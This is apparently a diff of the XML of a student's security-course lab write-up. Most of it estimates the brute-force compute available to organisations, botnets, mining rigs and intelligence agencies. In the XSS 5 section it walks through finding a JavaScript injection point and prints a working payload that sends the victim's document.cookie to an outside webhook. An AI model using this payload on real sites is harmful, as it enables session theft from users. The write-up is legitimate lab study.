+                      <m:t>0</m:t>
+                    </m:r>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>,283,200,000,000</m:t>
+                    </m:r>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>bits</m:t>
+                    </m:r>
+                  </m:num>
+                  <m:den>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>day</m:t>
+                    </m:r>
+                  </m:den>
+                </m:f>
+              </m:oMath>
+            </m:oMathPara>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:ind w:left="0"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Large Organisation Hacking :</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> A large organisation will likely implement a HPC with that budget in a server rack form</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>I found a moderately setup rack with 2x</w:t>
+            </w:r>
+            <w:r>
+              <w:t>AMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W)</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> per unit for $75-100k so they could</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>impl</w:t>
+            </w:r>
+            <w:r>
+              <w:t>e</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ment about 18 when you then account for other infrastructure costs</w:t>
+            </w:r>
+            <w:r>
+              <w:t>. Assuming each core is in full utilisation:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+            </w:pPr>
+            <m:oMathPara>
+              <m:oMath>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>≈18×</m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>2×32×3.55×</m:t>
+                </m:r>
+                <m:sSup>
+                  <m:sSupPr>
+                    <m:ctrlPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                        <w:i/>
+                      </w:rPr>
+                    </m:ctrlPr>
+                  </m:sSupPr>
+                  <m:e>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>10</m:t>
+                    </m:r>
+                  </m:e>
+                  <m:sup>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>9</m:t>
+                    </m:r>
+                  </m:sup>
+                </m:sSup>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t xml:space="preserve">= </m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>4,089,600,000,000</m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t xml:space="preserve"> bits/second</m:t>
+                </m:r>
+              </m:oMath>
+            </m:oMathPara>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+            </w:pPr>
+            <m:oMathPara>
+              <m:oMath>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>24×</m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>4,089,600,000,000</m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t xml:space="preserve">= </m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>98,150,400,000,000</m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t xml:space="preserve"> per day</m:t>
+                </m:r>
+              </m:oMath>
+            </m:oMathPara>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:ind w:left="0"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Large Botnet</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> :</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Assuming 5 million devices of the office workers device</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>The 25 Million dollar budget is to maintain exploitation services and infrastructure to command the bot net.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Hence using the office worker PC:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <m:oMath>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t>5000000×</m:t>
+              </m:r>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t>6×</m:t>
+              </m:r>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t>4.7×</m:t>
+              </m:r>
+              <m:sSup>
+                <m:sSupPr>
+                  <m:ctrlPr>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      <w:i/>
+                    </w:rPr>
+                  </m:ctrlPr>
+                </m:sSupPr>
+                <m:e>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>10</m:t>
+                  </m:r>
+                </m:e>
+                <m:sup>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>9</m:t>
+                  </m:r>
+                </m:sup>
+              </m:sSup>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t>×≈3.384×</m:t>
+              </m:r>
+              <m:sSup>
+                <m:sSupPr>
+                  <m:ctrlPr>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      <w:i/>
+                    </w:rPr>
+                  </m:ctrlPr>
+                </m:sSupPr>
+                <m:e>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>10</m:t>
+                  </m:r>
+                </m:e>
+                <m:sup>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>18</m:t>
+                  </m:r>
+                </m:sup>
+              </m:sSup>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t xml:space="preserve">bits/day </m:t>
+              </m:r>
+            </m:oMath>
+            <w:commentRangeEnd w:id="1"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="CommentReference"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:commentReference w:id="1"/>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Crypto Miner</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> :</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Assuming the hardware can compute per second the same as its hash rates, ignoring the differences that may lie within the ASIC algorithm</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Hardware costs 10k each and is a normal device hence with the budget there are 5000 devices</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <m:oMathPara>
+              <m:oMath>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>5000×270×</m:t>
+                </m:r>
+                <m:sSup>
+                  <m:sSupPr>
+                    <m:ctrlPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                        <w:i/>
+                      </w:rPr>
+                    </m:ctrlPr>
+                  </m:sSupPr>
+                  <m:e>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>10</m:t>
+                    </m:r>
+                  </m:e>
+                  <m:sup>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>12</m:t>
+                    </m:r>
+                  </m:sup>
+                </m:sSup>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>×24×3600≈</m:t>
+                </m:r>
+                <m:r>
+                  <m:rPr>
+                    <m:sty m:val="p"/>
+                  </m:rPr>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                    <w:color w:val="333333"/>
+                    <w:lang w:eastAsia="en-AU"/>
+                  </w:rPr>
+                  <m:t>1.1664x</m:t>
+                </m:r>
+                <m:sSup>
+                  <m:sSupPr>
+                    <m:ctrlPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                    </m:ctrlPr>
+                  </m:sSupPr>
+                  <m:e>
+                    <m:r>
+                      <m:rPr>
+                        <m:sty m:val="p"/>
+                      </m:rPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                      <m:t>10</m:t>
+                    </m:r>
+                  </m:e>
+                  <m:sup>
+                    <m:r>
+                      <m:rPr>
+                        <m:sty m:val="p"/>
+                      </m:rPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                      <m:t>23</m:t>
+                    </m:r>
+                  </m:sup>
+                </m:sSup>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                    <w:color w:val="333333"/>
+                    <w:lang w:eastAsia="en-AU"/>
+                  </w:rPr>
+                  <m:t>bits/day</m:t>
+                </m:r>
+              </m:oMath>
+            </m:oMathPara>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="333333"/>
+                <w:u w:val="single"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="333333"/>
+                <w:u w:val="single"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+              <w:t>Foreign Intelligence Agency:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+              <w:t>Note that we likely don’t have public knowledge of all processors available to some intelligence agencies which can in some cases perform exceptionally better than an estimate</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">However from research around NSA sites currently the estimated compute power is approximately 2 exaflops </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">with at least 2 of these type of super computing facilities: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+              <w:t>as assuming they are</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> only need on floating point operation for each decision/key calculation [Large Bit Width Processing :O]</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
+                <w:color w:val="333333"/>
+                <w:lang w:eastAsia="en-AU"/>
+              </w:rPr>
+            </w:pPr>
+            <m:oMathPara>
+              <m:oMath>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                    <w:color w:val="333333"/>
+                    <w:lang w:eastAsia="en-AU"/>
+                  </w:rPr>
+                  <m:t>2×</m:t>
+                </m:r>
+                <m:sSup>
+                  <m:sSupPr>
+                    <m:ctrlPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:i/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                    </m:ctrlPr>
+                  </m:sSupPr>
+                  <m:e>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                      <m:t>10</m:t>
+                    </m:r>
+                  </m:e>
+                  <m:sup>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                      <m:t>18</m:t>
+                    </m:r>
+                  </m:sup>
+                </m:sSup>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                    <w:color w:val="333333"/>
+                    <w:lang w:eastAsia="en-AU"/>
+                  </w:rPr>
+                  <m:t>×</m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                    <w:color w:val="333333"/>
+                    <w:lang w:eastAsia="en-AU"/>
+                  </w:rPr>
+                  <m:t>24×3600≈</m:t>
+                </m:r>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                    <w:color w:val="333333"/>
+                    <w:lang w:eastAsia="en-AU"/>
+                  </w:rPr>
+                  <m:t>3.456×</m:t>
+                </m:r>
+                <m:sSup>
+                  <m:sSupPr>
+                    <m:ctrlPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:i/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                    </m:ctrlPr>
+                  </m:sSupPr>
+                  <m:e>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                      <m:t>10</m:t>
+                    </m:r>
+                  </m:e>
+                  <m:sup>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                        <w:color w:val="333333"/>
+                        <w:lang w:eastAsia="en-AU"/>
+                      </w:rPr>
+                      <m:t>23</m:t>
+                    </m:r>
+                  </m:sup>
+                </m:sSup>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
+                    <w:color w:val="333333"/>
+                    <w:lang w:eastAsia="en-AU"/>
+                  </w:rPr>
+                  <m:t>bits/day</m:t>
+                </m:r>
+              </m:oMath>
+            </m:oMathPara>
+          </w:p>
           <w:p/>
         </w:tc>
       </w:tr>
@@ -494,6 +3719,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Extended</w:t>
       </w:r>
     </w:p>
@@ -509,7 +3735,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId12">
+      <w:hyperlink r:id="rId19">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -539,14 +3765,155 @@
             <w:tcW w:w="9360" w:type="dxa"/>
           </w:tcPr>
           <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>SQLi4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
           <w:p/>
           <w:p/>
           <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>XSS 5:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>I could find that the error page in the URL take HTML injection and by first trying to bold it and put an image in</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Then I tried with console.log(1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for javascript injection</w:t>
+            </w:r>
+            <w:r>
+              <w:t>:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+            </w:pPr>
+            <w:r>
+              <w:t>First Test</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="360"/>
+            </w:pPr>
+            <w:r>
+              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://webhooksite.net/7e34e9c2-187d-44b2-bf87-1538f7be3940',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="360"/>
+            </w:pPr>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="78D47ACE">
+                  <wp:extent cx="5931205" cy="4064209"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="315571931" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="315571931" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId20"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5931205" cy="4064209"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
           <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>XSS 6:</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
         </w:tc>
       </w:tr>
@@ -572,7 +3939,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId13">
+      <w:hyperlink r:id="rId21">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -636,7 +4003,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Wrap up</w:t>
       </w:r>
     </w:p>
@@ -654,8 +4020,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId14"/>
-      <w:footerReference w:type="default" r:id="rId15"/>
+      <w:headerReference w:type="default" r:id="rId22"/>
+      <w:footerReference w:type="default" r:id="rId23"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -663,6 +4029,64 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
+<w:comments xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" 